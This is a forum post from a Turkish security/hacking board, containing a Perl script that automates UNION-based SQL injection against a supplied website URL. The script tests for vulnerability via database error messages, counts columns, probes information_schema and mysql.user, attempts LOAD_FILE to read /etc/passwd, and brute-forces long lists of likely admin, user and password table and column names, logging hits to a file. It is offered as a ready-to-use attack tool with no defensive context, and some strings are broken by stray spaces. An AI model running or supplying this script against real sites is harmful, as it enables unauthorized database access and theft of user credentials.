İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SQL Injection-BruteForce

07-03-2012 23:17
#1
Alagros - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
EJAAD.
Mesajlar:
7.371
Teşekkür (Etti):
40
Teşekkür (Aldı):
747
Konular:
4356
Ticaret:
(0) %


Kodlar:

[PHP]#!/usr/bin/perl use LWP::Simple; if(!$ARGV[2]) { print "\n\n[+] SQL Injection

bruteforce By Bl4k3

-[+]-\n========================================="; print

"\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";

print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns

to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '')

(Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n"; exit (0); } @nombretabla=('admin','tblUsers','tblAdmin','user' ,'users','username','usernames','usuario',

'name','names','nombre','nombres','usuarios','memb er','members','admin_table', 'miembro','miembros','membername','admins','admini strator',

'administrators','passwd','password','passwords',' pass','Pass', 'tAdmin','tadmin','user_password','user_passwords' ,'user_name','user_names',

'member_password','mods','mod','moderators','moder ator','user_email', 'user_emails','user_mail','user_mails','mail','ema ils','email','address', 'e-mail','emailaddress','correo','correos','phpbb_use rs','log','logins',

'login','registers','register','usr','usrs','ps',' pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks ','manager','managers','administrador', 'tUser','tUsers','administradores','clave','login_ id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena', 'auth','key','senha', 'tb_admin','tb_administrator','tb_login','tb_logon ','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon',' logon','fazer','authorization', 'membros','utilizadores','staff','nuke_authors','a ccounts','account','accnts',

'associated','accnt','customers','customer','membr es','administrateur','utilisateur', 'tuser','tusers','utilisateurs','password','ammini stratore','god','God','authors', 'asociado','asociados','autores','membername','aut or','autores','Users','Admin','Members', 'Miembros','Usuario','Usuarios','ADMIN','USERS','U SER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEM BROS','MIEMBRO'); @nombrecolumna=('admin_name','log_utenti','cla_adm ','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorizati on','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name',' user_username','uname','user_uname','usern','user_ usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm', 'nm','user_nm','login','u_name','nombre','login_id ','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme', 'unme','psw','password','user_password','autores', 'pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword', 'passwd','user_passwd','passw','user_passw','pwrd' ,'user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena' ,'pas','sistema_password','autor','upassword','web _password','web_username'); if ( $ARGV[0] !~ /^http:/ ) { $ARGV[0] = "http://" . $ARGV[0]; } if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--") { $cmn.= "+"; $cfin.="--"; print "\n[+] Comments to use: '--' & '+'"; } else { $cmn.= "/**/"; $cfin.= "/*"; print "\n[+] Comments to use: '/*' & '/**/'"; } open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n"; if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK") { print "\n[!] Skipping the initial check...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "\n[!] Checking if the website is vulnerable...\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin; $response=get($sql)or die("[-] Wrong Website, check it\n"); if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/) { print "[+] Vulnerable website, script

continues...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n"; exit(1); } } print "\n[!] Looking up columns...\n"; for ($column = 0 ; $column < $ARGV[1] ; $column ++) { $union.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 0) { print WEB "\n[COLUMNS]:\n\n"; $inyection = ''; $union = ''; } $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cfin; $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n"); if($response =~ /loginpwnz/) { $column ++; print "[+] The site has $column columns\n\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfi n; print "$sql\n"; print WEB "$sql\n"; print "\n[!] Checking if Information_Schema exists..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cmn."from".$cmn."information_s chema.tables".$cfin; $response=get($sql)or die("[-] Impossible to get Information_Schema\n"); if($response =~ /loginpwnz/) { print "\n[+] Information_Schema available...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn ."from".$cmn."information_schema.tables".$cfin; print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n"; } else { print "\n[-] Information_Schema unavailable"; } print "\n[!] Checking if MySQL.User exists..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cmn."from".$cmn."mysql.user".$ cfin; $response=get($sql)or die("[-] Impossible to get MySQL.User\n"); if($response =~ /loginpwnz/) { print "\n[+] MySQL.User available...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn ."from".$cmn."mysql.user".$cfin; print WEB "\n\n[MYSQL.USER]:\n\n$sql\n"; } else { print "\n[-] MySQL.User unavailable"; } while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764 )'; $loadcont++; } print "\n[!] Checking if it is possible to inject LOAD_FILE..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f 6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n"); if($response =~

/root:x:/) { print "\n[+] LOAD_FILE available...saving in $ARGV[2]"; print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n"; } else { print "\n[-] LOAD_FILE unavailable"; } if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T") { print "\n\n[!] Brute forcing tables..."; print WEB "\n\n[TABLES]:\n\n"; foreach $tabla(@nombretabla) { chomp($tabla); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70 776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { print "\n[+] Table $tabla exists...saving in $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn ."from".$cmn.$tabla.$cfin; print WEB "$sql\n"; } } } if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C") { print "\n\n[!] Table to brute force columns: "; $tabla.=''; chomp($tabla); print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n"; foreach $columna(@nombrecolumna) { chomp($columna); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f6 7696e70776e7a,0x3a,$columna)".$inyection.$cmn."fro m".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { print "\n[+] Column $columna available...saving in $ARGV[2]"; print WEB "$columna\n"; } } } print WEB "\n\n\n[*EOF*]"; print "\n\n[+] Everything saved

correctly in $ARGV[2]\n\n"; print "## c0ded by Bl4k3 | 2010 ##\n\n"; exit (0); } } print "[-] Impossible to find number of columns, try more columns\n\n"; print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n"; exit (0); [/PHP]
Kullanıcı İmzası
DataMaN & _EroS_ & Ares & Alagros & Justice4ewer & MühüR


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı